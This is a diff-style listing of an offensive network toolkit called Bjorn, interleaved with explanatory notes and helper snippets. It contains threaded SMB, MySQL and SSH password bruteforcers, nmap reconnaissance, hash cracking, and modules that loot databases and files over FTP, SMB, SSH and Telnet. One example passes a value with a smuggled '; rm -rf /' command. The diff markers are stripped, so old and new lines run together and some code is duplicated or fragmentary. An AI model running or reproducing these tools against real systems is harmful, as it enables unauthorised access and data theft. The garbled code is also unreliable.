                with open(out_file, 'w', encoding="utf-8") as f:
                    json.dump({
                        "target_file": input_file,
                        "total_hashes": len(self.hashes),
                        "cracked_count": len(self.cracked),
                        "results": self.cracked
                    }, f, indent=4)
                logger.success(f"Cracked {len(self.cracked)} hashes! Results: {out_file}")
                self.shared_data.log_milestone(b_class, "Complete", f"Cracked {len(self.cracked)} hashes")
                return "success"

        logger.info("Cracking finished. No matches found.")
        self.shared_data.log_milestone(b_class, "Finished", "No passwords found")
        return "success"  # Still success even if 0 cracked, as it finished the task
            logger.info("Cracking finished. No matches found.")
            self.shared_data.log_milestone(b_class, "Finished", "No passwords found")
            return "success"  # Still success even if 0 cracked, as it finished the task
        finally:
            self.shared_data.bjorn_progress = ""
            self.shared_data.comment_params = {}

if __name__ == "__main__":
    # Minimal CLI for testing

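The NTLM branch above hinges on one fact: NTLM is MD4 over the UTF-16LE encoding of the password, and `hashlib` only exposes MD4 when the underlying OpenSSL build provides it (FIPS and some modern builds do not, hence the ValueError fallback). The same function in isolation:

    import hashlib

    def ntlm_hash(password: str):
        """NTLM = MD4 over the UTF-16LE encoding of the password."""
        try:
            return hashlib.new('md4', password.encode('utf-16le')).hexdigest()
        except ValueError:
            # MD4 is delegated to OpenSSL; FIPS/legacy-disabled builds may lack it.
            return None

    print(ntlm_hash("password") or "MD4 unavailable on this Python build")
    # On builds with MD4: 8846f7eaee8fb117ad06bdd830b7586c
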
@@ -1,13 +1,7 @@
# scanning.py – Network scanner (DB-first, no stubs)
# - Host discovery (nmap -sn -PR)
# - Resolve MAC/hostname (ThreadPoolExecutor) -> DB (hosts table)
# - Port scan (ThreadPoolExecutor) -> DB (merge ports by MAC)
# - Mark alive=0 for hosts not seen this run
# - Update stats (stats table)
# - Light logging (milestones) without flooding
# - WAL checkpoint(TRUNCATE) + PRAGMA optimize at end of scan
# - No DB insert without a real MAC. Unresolved IPs are kept in-memory.
# - RPi Zero optimized: bounded thread pools, reduced retries, adaptive concurrency
"""scanning.py - Network scanner: host discovery, MAC/hostname resolution, and port scanning.

DB-first design - all results go straight to SQLite. RPi Zero optimized.
"""

import os
import re
@@ -38,6 +32,18 @@ b_priority = 1
b_action = "global"
b_trigger = "on_interval:180"
b_requires = '{"max_concurrent": 1}'
b_enabled = 1
b_timeout = 300
b_max_retries = 1
b_stealth_level = 3
b_risk_level = "low"
b_tags = ["scan", "discovery", "network", "nmap"]
b_category = "recon"
b_name = "Network Scanner"
b_description = "Host discovery, MAC/hostname resolution, and port scanning via nmap."
b_author = "Bjorn Team"
b_version = "2.0.0"
b_icon = "NetworkScanner.png"

# --- Module-level constants (avoid re-creating per call) ---
_MAC_RE = re.compile(r'([0-9A-Fa-f]{2})([-:])(?:[0-9A-Fa-f]{2}\2){4}[0-9A-Fa-f]{2}')

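The pre-compiled `_MAC_RE` pattern accepts both `:` and `-` separators, and the `\2` backreference forces the same separator throughout, so mixed forms are rejected. A quick standalone check of that behavior:

    import re

    _MAC_RE = re.compile(r'([0-9A-Fa-f]{2})([-:])(?:[0-9A-Fa-f]{2}\2){4}[0-9A-Fa-f]{2}')

    for s in ("b8:27:eb:01:02:03", "B8-27-EB-01-02-03", "b8:27-eb:01:02:03"):
        print(s, "->", bool(_MAC_RE.fullmatch(s)))  # True, True, False (mixed separators)
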
@@ -1,12 +1,7 @@
"""
smb_bruteforce.py — SMB bruteforce (DB-backed, no CSV/JSON, no rich)
- Cibles fournies par l’orchestrateur (ip, port)
- IP -> (MAC, hostname) depuis DB.hosts
- Succès enregistrés dans DB.creds (service='smb'), 1 ligne PAR PARTAGE (database=<share>)
- Conserve la logique de queue/threads et les signatures. Plus de rich/progress.
"""
"""smb_bruteforce.py - Threaded SMB credential bruteforcer with share enumeration."""

import os
import shlex
import threading
import logging
import time
@@ -29,14 +24,27 @@ b_parent = None
b_service = '["smb"]'
b_trigger = 'on_any:["on_service:smb","on_new_port:445"]'
b_priority = 70
b_cooldown = 1800  # 30 minutes entre deux runs
b_rate_limit = '3/86400'  # 3 fois par jour max
b_cooldown = 1800  # 30 min between runs
b_rate_limit = '3/86400'  # max 3 per day
b_enabled = 1
b_action = "normal"
b_timeout = 600
b_max_retries = 2
b_stealth_level = 3
b_risk_level = "medium"
b_tags = ["bruteforce", "smb", "credentials", "shares"]
b_category = "exploitation"
b_name = "SMB Bruteforce"
b_description = "Threaded SMB credential bruteforcer with share enumeration."
b_author = "Bjorn Team"
b_version = "2.0.0"
b_icon = "SMBBruteforce.png"

IGNORED_SHARES = {'print$', 'ADMIN$', 'IPC$', 'C$', 'D$', 'E$', 'F$'}


class SMBBruteforce:
    """Wrapper orchestrateur -> SMBConnector."""
    """Orchestrator wrapper for SMBConnector."""

    def __init__(self, shared_data):
        self.shared_data = shared_data
@@ -44,11 +52,11 @@ class SMBBruteforce:
        logger.info("SMBConnector initialized.")

    def bruteforce_smb(self, ip, port):
        """Lance le bruteforce SMB pour (ip, port)."""
        """Run SMB bruteforce for (ip, port)."""
        return self.smb_bruteforce.run_bruteforce(ip, port)

    def execute(self, ip, port, row, status_key):
        """Point d'entrée orchestrateur (retour 'success' / 'failed')."""
        """Orchestrator entry point. Returns 'success' or 'failed'."""
        self.shared_data.bjorn_orch_status = "SMBBruteforce"
        self.shared_data.comment_params = {"user": "?", "ip": ip, "port": str(port)}
        success, results = self.bruteforce_smb(ip, port)
@@ -56,12 +64,12 @@ class SMBBruteforce:


class SMBConnector:
    """Gère les tentatives SMB, la persistance DB et le mapping IP→(MAC, Hostname)."""
    """Handles SMB attempts, DB persistence, and IP->(MAC, Hostname) mapping."""

    def __init__(self, shared_data):
        self.shared_data = shared_data

        # Wordlists inchangées
        # Wordlists
        self.users = self._read_lines(shared_data.users_file)
        self.passwords = self._read_lines(shared_data.passwords_file)

@@ -74,7 +82,7 @@ class SMBConnector:
        self.queue = Queue()
        self.progress = None

    # ---------- util fichiers ----------
    # ---------- file utils ----------
    @staticmethod
    def _read_lines(path: str) -> List[str]:
        try:
@@ -142,10 +150,10 @@ class SMBConnector:

    def smbclient_l(self, adresse_ip: str, user: str, password: str) -> List[str]:
        timeout = int(getattr(self.shared_data, "smb_connect_timeout_s", 6))
        cmd = f'smbclient -L {adresse_ip} -U {user}%{password}'
        cmd = ['smbclient', '-L', adresse_ip, '-U', f'{user}%{password}']
        process = None
        try:
            process = Popen(cmd, shell=True, stdout=PIPE, stderr=PIPE)
            process = Popen(cmd, shell=False, stdout=PIPE, stderr=PIPE)
            try:
                stdout, stderr = process.communicate(timeout=timeout)
            except TimeoutExpired:
@@ -164,7 +172,7 @@ class SMBConnector:
            logger.info(f"Trying smbclient -L for {adresse_ip} with user '{user}'")
            return []
        except Exception as e:
            logger.error(f"Error executing '{cmd}': {e}")
            logger.error(f"Error executing smbclient -L for {adresse_ip}: {e}")
            return []
        finally:
            if process:
@@ -269,7 +277,7 @@ class SMBConnector:
        hostname = self.hostname_for_ip(adresse_ip) or ""

        dict_passwords, fallback_passwords = merged_password_plan(self.shared_data, self.passwords)
        total_tasks = len(self.users) * (len(dict_passwords) + len(fallback_passwords) + len(dict_passwords))
        total_tasks = len(self.users) * (len(dict_passwords) + len(fallback_passwords))
        if total_tasks == 0:
            logger.warning("No users/passwords loaded. Abort.")
            return False, []
@@ -339,7 +347,7 @@ class SMBConnector:

    # ---------- persistence DB ----------
    def save_results(self):
        # insère self.results dans creds (service='smb'), database = <share>
        # Insert results into creds (service='smb'), database = <share>
        for mac, ip, hostname, share, user, password, port in self.results:
            try:
                self.shared_data.db.insert_cred(
@@ -350,7 +358,7 @@ class SMBConnector:
                    user=user,
                    password=password,
                    port=port,
                    database=share,  # utilise la colonne 'database' pour distinguer les shares
                    database=share,  # uses the 'database' column to distinguish shares
                    extra=None
                )
            except Exception as e:
@@ -364,12 +372,12 @@ class SMBConnector:
        self.results = []

    def removeduplicates(self):
        # plus nécessaire avec l'index unique; conservé pour compat.
        # No longer needed with unique index; kept for compat.
        pass


if __name__ == "__main__":
    # Mode autonome non utilisé en prod; on laisse simple
    # Standalone mode, not used in prod
    try:
        sd = SharedData()
        smb_bruteforce = SMBBruteforce(sd)

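Switching `smbclient` from a `shell=True` command string to an argument list closes the quoting hole when a username or password contains shell metacharacters. The pattern in isolation (a generic sketch; it assumes the binary is on PATH):

    from subprocess import Popen, PIPE, TimeoutExpired

    def run_tool(argv, timeout=6.0):
        """Run a command without a shell; kill it if it exceeds the timeout."""
        proc = Popen(argv, shell=False, stdout=PIPE, stderr=PIPE)
        try:
            out, _ = proc.communicate(timeout=timeout)
        except TimeoutExpired:
            proc.kill()
            out, _ = proc.communicate()
        return out.decode(errors="ignore")

    # 'pass$word; rm -rf /' is passed as one literal argument - no shell ever parses it.
    print(run_tool(['smbclient', '-L', '192.0.2.10', '-U', 'guest%pass$word; rm -rf /']))
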
@@ -1,11 +1,4 @@
"""
sql_bruteforce.py — MySQL bruteforce (DB-backed, no CSV/JSON, no rich)
- Cibles: (ip, port) par l’orchestrateur
- IP -> (MAC, hostname) via DB.hosts
- Connexion sans DB puis SHOW DATABASES; une entrée par DB trouvée
- Succès -> DB.creds (service='sql', database=<db>)
- Conserve la logique (pymysql, queue/threads)
"""
"""sql_bruteforce.py - Threaded MySQL credential bruteforcer with database enumeration."""

import os
import pymysql
@@ -29,11 +22,24 @@ b_parent = None
b_service = '["sql"]'
b_trigger = 'on_any:["on_service:sql","on_new_port:3306"]'
b_priority = 70
b_cooldown = 1800  # 30 minutes entre deux runs
b_rate_limit = '3/86400'  # 3 fois par jour max
b_cooldown = 1800  # 30 min between runs
b_rate_limit = '3/86400'  # max 3 per day
b_enabled = 1
b_action = "normal"
b_timeout = 600
b_max_retries = 2
b_stealth_level = 3
b_risk_level = "medium"
b_tags = ["bruteforce", "sql", "mysql", "credentials"]
b_category = "exploitation"
b_name = "SQL Bruteforce"
b_description = "Threaded MySQL credential bruteforcer with database enumeration."
b_author = "Bjorn Team"
b_version = "2.0.0"
b_icon = "SQLBruteforce.png"

class SQLBruteforce:
    """Wrapper orchestrateur -> SQLConnector."""
    """Orchestrator wrapper for SQLConnector."""

    def __init__(self, shared_data):
        self.shared_data = shared_data
@@ -41,11 +47,11 @@ class SQLBruteforce:
        logger.info("SQLConnector initialized.")

    def bruteforce_sql(self, ip, port):
        """Lance le bruteforce SQL pour (ip, port)."""
        """Run SQL bruteforce for (ip, port)."""
        return self.sql_bruteforce.run_bruteforce(ip, port)

    def execute(self, ip, port, row, status_key):
        """Point d'entrée orchestrateur (retour 'success' / 'failed')."""
        """Orchestrator entry point. Returns 'success' or 'failed'."""
        self.shared_data.bjorn_orch_status = "SQLBruteforce"
        self.shared_data.comment_params = {"user": "?", "ip": ip, "port": str(port)}
        success, results = self.bruteforce_sql(ip, port)
@@ -53,12 +59,12 @@ class SQLBruteforce:


class SQLConnector:
    """Gère les tentatives SQL (MySQL), persistance DB, mapping IP→(MAC, Hostname)."""
    """Handles SQL (MySQL) attempts, DB persistence, and IP->(MAC, Hostname) mapping."""

    def __init__(self, shared_data):
        self.shared_data = shared_data

        # Wordlists inchangées
        # Wordlists
        self.users = self._read_lines(shared_data.users_file)
        self.passwords = self._read_lines(shared_data.passwords_file)

@@ -71,7 +77,7 @@ class SQLConnector:
        self.queue = Queue()
        self.progress = None

    # ---------- util fichiers ----------
    # ---------- file utils ----------
    @staticmethod
    def _read_lines(path: str) -> List[str]:
        try:
@@ -115,7 +121,7 @@ class SQLConnector:
    # ---------- SQL ----------
    def sql_connect(self, adresse_ip: str, user: str, password: str, port: int = 3306):
        """
        Connexion sans DB puis SHOW DATABASES; retourne (True, [dbs]) ou (False, []).
        Connect without DB then SHOW DATABASES. Returns (True, [dbs]) or (False, []).
        """
        timeout = int(getattr(self.shared_data, "sql_connect_timeout_s", 6))
        try:
@@ -188,7 +194,7 @@ class SQLConnector:
                logger.info("Orchestrator exit signal received, stopping worker thread.")
                break

            adresse_ip, user, password, port = self.queue.get()
            adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
            try:
                success, databases = self.sql_connect(adresse_ip, user, password, port=port)
                if success:
@@ -213,6 +219,8 @@ class SQLConnector:

    def run_bruteforce(self, adresse_ip: str, port: int):
        self.results = []
        mac_address = self.mac_for_ip(adresse_ip)
        hostname = self.hostname_for_ip(adresse_ip) or ""
        dict_passwords, fallback_passwords = merged_password_plan(self.shared_data, self.passwords)
        total_tasks = len(self.users) * (len(dict_passwords) + len(fallback_passwords))
        if total_tasks == 0:
@@ -232,7 +240,7 @@ class SQLConnector:
                if self.shared_data.orchestrator_should_exit:
                    logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
                    return
                self.queue.put((adresse_ip, user, password, port))
                self.queue.put((adresse_ip, user, password, mac_address, hostname, port))

        threads = []
        thread_count = min(8, max(1, phase_tasks))
@@ -261,7 +269,7 @@ class SQLConnector:

    # ---------- persistence DB ----------
    def save_results(self):
        # pour chaque DB trouvée, créer/mettre à jour une ligne dans creds (service='sql', database=<dbname>)
        # For each DB found, create/update a row in creds (service='sql', database=<dbname>)
        for ip, user, password, port, dbname in self.results:
            mac = self.mac_for_ip(ip)
            hostname = self.hostname_for_ip(ip) or ""
@@ -288,7 +296,7 @@ class SQLConnector:
        self.results = []

    def remove_duplicates(self):
        # inutile avec l’index unique; conservé pour compat.
        # No longer needed with unique index; kept for compat.
        pass


@@ -1,15 +1,4 @@
"""
ssh_bruteforce.py - This script performs a brute force attack on SSH services (port 22)
to find accessible accounts using various user credentials. It logs the results of
successful connections.

SQL version (minimal changes):
- Targets still provided by the orchestrator (ip + port)
- IP -> (MAC, hostname) mapping read from DB 'hosts'
- Successes saved into DB.creds (service='ssh') with robust fallback upsert
- Action status recorded in DB.action_results (via SSHBruteforce.execute)
- Paramiko noise silenced; ssh.connect avoids agent/keys to reduce hangs
"""
"""ssh_bruteforce.py - Threaded SSH credential bruteforcer via paramiko."""

import os
import paramiko
@@ -24,7 +13,6 @@ from shared import SharedData
from actions.bruteforce_common import ProgressTracker, merged_password_plan
from logger import Logger

# Configure the logger
logger = Logger(name="ssh_bruteforce.py", level=logging.DEBUG)

# Silence Paramiko internals
@@ -32,7 +20,6 @@ for _name in ("paramiko", "paramiko.transport", "paramiko.client", "paramiko.hos
                "paramiko.kex", "paramiko.auth_handler"):
    logging.getLogger(_name).setLevel(logging.CRITICAL)

# Define the necessary global variables
b_class = "SSHBruteforce"
b_module = "ssh_bruteforce"
b_status = "brute_force_ssh"
@@ -40,9 +27,22 @@ b_port = 22
b_service = '["ssh"]'
b_trigger = 'on_any:["on_service:ssh","on_new_port:22"]'
b_parent = None
b_priority = 70  # tu peux ajuster la priorité si besoin
b_cooldown = 1800  # 30 minutes entre deux runs
b_rate_limit = '3/86400'  # 3 fois par jour max
b_priority = 70
b_cooldown = 1800  # 30 min between runs
b_rate_limit = '3/86400'  # max 3 per day
b_enabled = 1
b_action = "normal"
b_timeout = 600
b_max_retries = 2
b_stealth_level = 3
b_risk_level = "medium"
b_tags = ["bruteforce", "ssh", "credentials"]
b_category = "exploitation"
b_name = "SSH Bruteforce"
b_description = "Threaded SSH credential bruteforcer via paramiko with dictionary and exhaustive modes."
b_author = "Bjorn Team"
b_version = "2.0.0"
b_icon = "SSHBruteforce.png"


class SSHBruteforce:
@@ -298,6 +298,19 @@ class SSHConnector:
            t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True)
            t.start()
            threads.append(t)

        # Drain queue if orchestrator exit is requested, to unblock join
        while not self.queue.empty():
            if self.shared_data.orchestrator_should_exit:
                # Discard remaining items so workers can finish
                while not self.queue.empty():
                    try:
                        self.queue.get_nowait()
                        self.queue.task_done()
                    except Exception:
                        break
                break
            time.sleep(0.5)
        self.queue.join()
        for t in threads:
            t.join()

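The drain added above matters because `queue.join()` only returns once every `put` has a matching `task_done`; on an exit request the pending items must be consumed or the join blocks forever. The pattern in isolation:

    import queue

    q = queue.Queue()
    for i in range(10):
        q.put(i)

    def drain(q):
        """Discard pending items, balancing task_done so q.join() can return."""
        while True:
            try:
                q.get_nowait()
            except queue.Empty:
                break
            q.task_done()

    drain(q)
    q.join()  # returns immediately: every put() has been matched by task_done()
    print("joined cleanly")
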
@@ -1,13 +1,4 @@
"""
steal_data_sql.py — SQL data looter (DB-backed)

SQL mode:
- Orchestrator provides (ip, port) after parent success (SQLBruteforce).
- DB.creds (service='sql') provides (user,password, database?).
- We connect first without DB to enumerate tables (excluding system schemas),
  then connect per schema to export CSVs.
- Output under: {data_stolen_dir}/sql/{mac}_{ip}/{schema}/{schema_table}.csv
"""
"""steal_data_sql.py - Exfiltrate MySQL databases as CSV after successful bruteforce."""

import os
import logging
@@ -41,6 +32,12 @@ b_risk_level = "high"  # 'low' | 'medium' | 'high'
b_enabled = 1  # set to 0 to disable from DB sync
# Tags (free taxonomy, JSON-ified by sync_actions)
b_tags = ["exfil", "sql", "loot", "db", "mysql"]
b_category = "exfiltration"
b_name = "Steal Data SQL"
b_description = "Exfiltrate MySQL databases as CSV after successful credential bruteforce."
b_author = "Bjorn Team"
b_version = "2.0.0"
b_icon = "StealDataSQL.png"

class StealDataSQL:
    def __init__(self, shared_data: SharedData):
@@ -169,6 +166,11 @@ class StealDataSQL:
            logger.info("Data steal interrupted.")
            return

        # Validate identifiers to prevent SQL injection
        import re as _re
        if not _re.match(r'^[a-zA-Z0-9_]+$', schema) or not _re.match(r'^[a-zA-Z0-9_]+$', table):
            logger.warning(f"Skipping unsafe schema/table name: {schema}.{table}")
            return
        q = text(f"SELECT * FROM `{schema}`.`{table}`")
        with engine.connect() as conn:
            result = conn.execute(q)
@@ -192,6 +194,8 @@ class StealDataSQL:
    def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
        try:
            self.shared_data.bjorn_orch_status = b_class
            # EPD live status
            self.shared_data.comment_params = {"ip": ip, "port": str(port), "databases": "0", "tables": "0"}
            try:
                port_i = int(port)
            except Exception:
@@ -250,3 +254,6 @@ class StealDataSQL:
        except Exception as e:
            logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
            return 'failed'
        finally:
            self.shared_data.bjorn_progress = ""
            self.shared_data.comment_params = {}

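Schema and table names cannot be bound as SQL parameters, which is why the diff validates them against a strict allowlist before interpolating into backticks. The same guard as a standalone helper (plain sketch, not Bjorn's code):

    import re

    _IDENT = re.compile(r'^[A-Za-z0-9_]+$')

    def dump_query(schema: str, table: str) -> str:
        """Build a SELECT only for identifiers that match the allowlist."""
        if not (_IDENT.match(schema) and _IDENT.match(table)):
            raise ValueError(f"unsafe identifier: {schema}.{table}")
        return f"SELECT * FROM `{schema}`.`{table}`"

    print(dump_query("shop", "orders"))         # SELECT * FROM `shop`.`orders`
    # dump_query("shop", "orders`; DROP ...")   # would raise ValueError
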
@@ -1,12 +1,4 @@
"""
steal_files_ftp.py — FTP file looter (DB-backed)

SQL mode:
- Orchestrator provides (ip, port) after parent success (FTPBruteforce).
- FTP credentials are read from DB.creds (service='ftp'); anonymous is also tried.
- IP -> (MAC, hostname) via DB.hosts.
- Loot saved under: {data_stolen_dir}/ftp/{mac}_{ip}/(anonymous|<username>)/...
"""
"""steal_files_ftp.py - Loot files from FTP servers using cracked or anonymous credentials."""

import os
import logging
@@ -26,6 +18,24 @@ b_module = "steal_files_ftp"
b_status = "steal_files_ftp"
b_parent = "FTPBruteforce"
b_port = 21
b_enabled = 1
b_action = "normal"
b_service = '["ftp"]'
b_trigger = 'on_any:["on_cred_found:ftp","on_service:ftp"]'
b_requires = '{"all":[{"has_cred":"ftp"},{"has_port":21}]}'
b_priority = 60
b_cooldown = 3600
b_timeout = 600
b_stealth_level = 5
b_risk_level = "high"
b_max_retries = 1
b_tags = ["exfil", "ftp", "loot", "files"]
b_category = "exfiltration"
b_name = "Steal Files FTP"
b_description = "Loot files from FTP servers using cracked or anonymous credentials."
b_author = "Bjorn Team"
b_version = "2.0.0"
b_icon = "StealFilesFTP.png"


class StealFilesFTP:
@@ -108,7 +118,7 @@ class StealFilesFTP:
        return out

    # -------- FTP helpers --------
    # Max file size to download (10 MB) — protects RPi Zero RAM
    # Max file size to download (10 MB) - protects RPi Zero RAM
    _MAX_FILE_SIZE = 10 * 1024 * 1024
    # Max recursion depth for directory traversal (avoids symlink loops)
    _MAX_DEPTH = 5
@@ -180,6 +190,8 @@ class StealFilesFTP:
        timer = None
        try:
            self.shared_data.bjorn_orch_status = b_class
            # EPD live status
            self.shared_data.comment_params = {"ip": ip, "port": str(port), "files": "0"}
            try:
                port_i = int(port)
            except Exception:
@@ -268,5 +280,6 @@ class StealFilesFTP:
            logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
            return 'failed'
        finally:
            self.shared_data.bjorn_progress = ""
            if timer:
                timer.cancel()

@@ -1,12 +1,4 @@
"""
steal_files_smb.py — SMB file looter (DB-backed).

SQL mode:
- Orchestrator provides (ip, port) after parent success (SMBBruteforce).
- DB.creds (service='smb') provides credentials; 'database' column stores share name.
- Also try anonymous (''/'').
- Output under: {data_stolen_dir}/smb/{mac}_{ip}/{share}/...
"""
"""steal_files_smb.py - Loot files from SMB shares using cracked or anonymous credentials."""

import os
import logging
@@ -25,6 +17,24 @@ b_module = "steal_files_smb"
b_status = "steal_files_smb"
b_parent = "SMBBruteforce"
b_port = 445
b_enabled = 1
b_action = "normal"
b_service = '["smb"]'
b_trigger = 'on_any:["on_cred_found:smb","on_service:smb"]'
b_requires = '{"all":[{"has_cred":"smb"},{"has_port":445}]}'
b_priority = 60
b_cooldown = 3600
b_timeout = 600
b_stealth_level = 5
b_risk_level = "high"
b_max_retries = 1
b_tags = ["exfil", "smb", "loot", "files"]
b_category = "exfiltration"
b_name = "Steal Files SMB"
b_description = "Loot files from SMB shares using cracked or anonymous credentials."
b_author = "Bjorn Team"
b_version = "2.0.0"
b_icon = "StealFilesSMB.png"


class StealFilesSMB:
@@ -166,6 +176,8 @@ class StealFilesSMB:
    def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
        try:
            self.shared_data.bjorn_orch_status = b_class
            # EPD live status
            self.shared_data.comment_params = {"ip": ip, "port": str(port), "share": "?", "files": "0"}
            try:
                port_i = int(port)
            except Exception:
@@ -250,3 +262,6 @@ class StealFilesSMB:
        except Exception as e:
            logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
            return 'failed'
        finally:
            self.shared_data.bjorn_progress = ""
            self.shared_data.comment_params = {}

@@ -1,23 +1,11 @@
"""
steal_files_ssh.py — SSH file looter (DB-backed)

SQL mode:
- Orchestrator provides (ip, port) and ensures parent action success (SSHBruteforce).
- SSH credentials are read from the DB table `creds` (service='ssh').
- IP -> (MAC, hostname) mapping is read from the DB table `hosts`.
- Looted files are saved under: {shared_data.data_stolen_dir}/ssh/{mac}_{ip}/...
- Paramiko logs are silenced to avoid noisy banners/tracebacks.

Parent gate:
- Orchestrator enforces parent success (b_parent='SSHBruteforce').
- This action runs once per eligible target (alive, open port, parent OK).
"""
"""steal_files_ssh.py - Loot files over SSH/SFTP using cracked credentials."""

import os
import shlex
import time
import logging
import paramiko
from threading import Timer
from threading import Timer, Lock
from typing import List, Tuple, Dict, Optional

from shared import SharedData
@@ -35,7 +23,7 @@ b_module = "steal_files_ssh" # Python module name (this file without
b_status = "steal_files_ssh"  # Human/readable status key (free form)

b_action = "normal"  # 'normal' (per-host) or 'global'
b_service = ["ssh"]  # Services this action is about (JSON-ified by sync_actions)
b_service = '["ssh"]'  # Services this action is about (JSON string for AST parser)
b_port = 22  # Preferred target port (used if present on host)

# Trigger strategy:
@@ -61,6 +49,13 @@ b_rate_limit = "3/86400" # at most 3 executions/day per host (ext
b_stealth_level = 6  # 1..10 (higher = more stealthy)
b_risk_level = "high"  # 'low' | 'medium' | 'high'
b_enabled = 1  # set to 0 to disable from DB sync
b_tags = ["exfil", "ssh", "sftp", "loot", "files"]
b_category = "exfiltration"
b_name = "Steal Files SSH"
b_description = "Loot files over SSH/SFTP using cracked credentials."
b_author = "Bjorn Team"
b_version = "2.0.0"
b_icon = "StealFilesSSH.png"

# Tags (free taxonomy, JSON-ified by sync_actions)
b_tags = ["exfil", "ssh", "loot"]
@@ -71,6 +66,7 @@ class StealFilesSSH:
    def __init__(self, shared_data: SharedData):
        """Init: store shared_data, flags, and build an IP->(MAC, hostname) cache."""
        self.shared_data = shared_data
        self._state_lock = Lock()  # protects sftp_connected / stop_execution
        self.sftp_connected = False  # flipped to True on first SFTP open
        self.stop_execution = False  # global kill switch (timer / orchestrator exit)
        self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
@@ -194,8 +190,8 @@ class StealFilesSSH:
        - shared_data.steal_file_names (substring match)
        Uses `find <dir> -type f 2>/dev/null` to keep it quiet.
        """
        # Quiet 'permission denied' messages via redirection
        cmd = f'find {dir_path} -type f 2>/dev/null'
        # Quiet 'permission denied' messages via redirection; escape dir_path to prevent injection
        cmd = f'find {shlex.quote(dir_path)} -type f 2>/dev/null'
        stdin, stdout, stderr = ssh.exec_command(cmd)
        files = (stdout.read().decode(errors="ignore") or "").splitlines()

@@ -203,7 +199,7 @@ class StealFilesSSH:
        names = set(self.shared_data.steal_file_names or [])
        if not exts and not names:
            # If no filters are defined, do nothing (too risky to pull everything).
            logger.warning("No steal_file_extensions / steal_file_names configured — skipping.")
            logger.warning("No steal_file_extensions / steal_file_names configured - skipping.")
            return []

        matches: List[str] = []
@@ -218,7 +214,7 @@ class StealFilesSSH:
        logger.info(f"Found {len(matches)} matching files in {dir_path}")
        return matches

    # Max file size to download (10 MB) — protects RPi Zero RAM
    # Max file size to download (10 MB) - protects RPi Zero RAM
    _MAX_FILE_SIZE = 10 * 1024 * 1024

    def steal_file(self, ssh: paramiko.SSHClient, remote_file: str, local_dir: str) -> None:
@@ -227,7 +223,8 @@ class StealFilesSSH:
        Skips files larger than _MAX_FILE_SIZE to protect RPi Zero memory.
        """
        sftp = ssh.open_sftp()
        self.sftp_connected = True  # first time we open SFTP, mark as connected
        with self._state_lock:
            self.sftp_connected = True  # first time we open SFTP, mark as connected

        try:
            # Check file size before downloading
@@ -235,7 +232,7 @@ class StealFilesSSH:
                st = sftp.stat(remote_file)
                if st.st_size and st.st_size > self._MAX_FILE_SIZE:
                    logger.info(f"Skipping {remote_file} ({st.st_size} bytes > {self._MAX_FILE_SIZE} limit)")
                    return
                    return  # finally block still runs and closes sftp
            except Exception:
                pass  # stat failed, try download anyway

@@ -245,6 +242,14 @@ class StealFilesSSH:
            os.makedirs(local_file_dir, exist_ok=True)

            local_file_path = os.path.join(local_file_dir, os.path.basename(remote_file))

            # Path traversal guard: ensure we stay within local_dir
            abs_local = os.path.realpath(local_file_path)
            abs_base = os.path.realpath(local_dir)
            if not abs_local.startswith(abs_base + os.sep) and abs_local != abs_base:
                logger.warning(f"Path traversal blocked: {remote_file} -> {abs_local}")
                return

            sftp.get(remote_file, local_file_path)

            logger.success(f"Downloaded: {remote_file} -> {local_file_path}")
@@ -286,9 +291,10 @@ class StealFilesSSH:

        # Define a timer: if we never establish SFTP in 4 minutes, abort
        def _timeout():
            if not self.sftp_connected:
                logger.error(f"No SFTP connection established within 4 minutes for {ip}. Marking as failed.")
                self.stop_execution = True
            with self._state_lock:
                if not self.sftp_connected:
                    logger.error(f"No SFTP connection established within 4 minutes for {ip}. Marking as failed.")
                    self.stop_execution = True

        timer = Timer(240, _timeout)
        timer.start()

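The containment check above compares `realpath` results, so `..` segments and symlinks in a server-supplied name cannot redirect the download outside the loot directory. The same guard as a standalone helper:

    import os
    from typing import Optional

    def safe_join(base_dir: str, untrusted_path: str) -> Optional[str]:
        """Resolve and verify that the target stays under base_dir."""
        candidate = os.path.join(base_dir, untrusted_path)
        abs_local = os.path.realpath(candidate)
        abs_base = os.path.realpath(base_dir)
        if abs_local != abs_base and not abs_local.startswith(abs_base + os.sep):
            return None  # '..' segments or symlinks escaped the loot dir - refuse
        return abs_local

    print(safe_join("/tmp/loot", "docs/passwords.txt"))  # /tmp/loot/docs/passwords.txt
    print(safe_join("/tmp/loot", "../../etc/shadow"))    # None
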
@@ -1,12 +1,4 @@
|
||||
"""
|
||||
steal_files_telnet.py — Telnet file looter (DB-backed)
|
||||
|
||||
SQL mode:
|
||||
- Orchestrator provides (ip, port) after parent success (TelnetBruteforce).
|
||||
- Credentials read from DB.creds (service='telnet'); we try each pair.
|
||||
- Files found via 'find / -type f', then retrieved with 'cat'.
|
||||
- Output under: {data_stolen_dir}/telnet/{mac}_{ip}/...
|
||||
"""
|
||||
"""steal_files_telnet.py - Loot files over Telnet using cracked credentials."""
|
||||
|
||||
import os
|
||||
import telnetlib
|
||||
@@ -25,6 +17,24 @@ b_module = "steal_files_telnet"
|
||||
b_status = "steal_files_telnet"
|
||||
b_parent = "TelnetBruteforce"
|
||||
b_port = 23
|
||||
b_enabled = 1
|
||||
b_action = "normal"
|
||||
b_service = '["telnet"]'
|
||||
b_trigger = 'on_any:["on_cred_found:telnet","on_service:telnet"]'
|
||||
b_requires = '{"all":[{"has_cred":"telnet"},{"has_port":23}]}'
|
||||
b_priority = 60
|
||||
b_cooldown = 3600
|
||||
b_timeout = 600
|
||||
b_stealth_level = 5
|
||||
b_risk_level = "high"
|
||||
b_max_retries = 1
|
||||
b_tags = ["exfil", "telnet", "loot", "files"]
|
||||
b_category = "exfiltration"
|
||||
b_name = "Steal Files Telnet"
|
||||
b_description = "Loot files over Telnet using cracked credentials."
|
||||
b_author = "Bjorn Team"
|
||||
b_version = "2.0.0"
|
||||
b_icon = "StealFilesTelnet.png"
|
||||
|
||||
|
||||
class StealFilesTelnet:
|
||||
@@ -110,7 +120,7 @@ class StealFilesTelnet:
|
||||
if password:
|
||||
tn.read_until(b"Password: ", timeout=5)
|
||||
tn.write(password.encode('ascii') + b"\n")
|
||||
